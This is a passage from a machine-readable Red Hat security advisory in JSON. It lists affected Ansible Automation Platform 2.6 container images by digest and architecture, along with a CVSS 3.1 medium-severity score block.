"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
